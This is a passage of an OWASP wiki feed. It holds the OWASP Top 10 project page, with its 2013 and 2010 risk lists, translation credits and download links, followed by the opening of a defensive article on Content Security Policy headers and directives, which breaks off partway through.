* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Content_Security_Policy&amp;diff=233677</id>
		<title>Content Security Policy</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Content_Security_Policy&amp;diff=233677"/>
				<updated>2017-09-24T18:17:30Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: grammar&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{taggedDocument&lt;br /&gt;
| type=pls_review&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''08/31/2013'''&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
'''CSP''' stands for '''C'''ontent '''S'''ecurity '''P'''olicy. &lt;br /&gt;
&lt;br /&gt;
Is a W3C specification offering the possibility to instruct the client browser from which location and/or which type of resources are allowed to be loaded. To define a loading behavior, the CSP specification use &amp;quot;directive&amp;quot; where a directive defines a loading behavior for a target resource type.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This article is based on version [http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html 1.1] of the W3C specification.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Directives can be specified using HTTP response header (a server may send more than one CSP HTTP header field with a given resource representation and a server may send different CSP header field values with different representations of the same resource or with different resources) or HTML Meta tag, the HTTP headers below are defined by the specs:&lt;br /&gt;
* '''Content-Security-Policy''' : Defined by W3C Specs as standard header, used by Chrome version 25 and later, Firefox version 23 and later, Opera version 19 and later.&lt;br /&gt;
* '''X-Content-Security-Policy''' : Used by Firefox until version 23, and Internet Explorer version 10 (which partially implements Content Security Policy).&lt;br /&gt;
* '''X-WebKit-CSP''' : Used by Chrome until version 25&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The supported directives are:&lt;br /&gt;
* '''default-src''' : Define loading policy for all resources type in case of a resource type dedicated directive is not defined (fallback),&lt;br /&gt;
* '''script-src''' :  Define which scripts the protected resource can execute,&lt;br /&gt;
* '''object-src''' :  Define from where the protected resource can load plugins,&lt;br /&gt;
* '''style-src''' : Define which styles (CSS) the user applies to the protected resource,&lt;br /&gt;
* '''img-src''' : Define from where the protected resource can load images,&lt;br /&gt;
* '''media-src''' : Define from where the protected resource can load video and audio,&lt;br /&gt;
* '''frame-src''' : Define from where the protected resource can embed frames,&lt;br /&gt;
* '''font-src''' : Define from where the protected resource can load fonts,&lt;br /&gt;
* '''connect-src''' : Define which URIs the protected resource can load using script interfaces,&lt;br /&gt;
* '''form-action''' : Define which URIs can be used as the action of HTML form elements,&lt;br /&gt;
* '''sandbox''' : Specifies an HTML sandbox policy that the user agent applies to the protected resource,&lt;br /&gt;
* '''script-nonce''' : Define script execution by requiring the presence of the specified nonce on script elements,&lt;br /&gt;
* '''plugin-types''' : Define the set of plugins that can be invoked by the protected resource by limiting the types of resources that can be embedded,&lt;br /&gt;
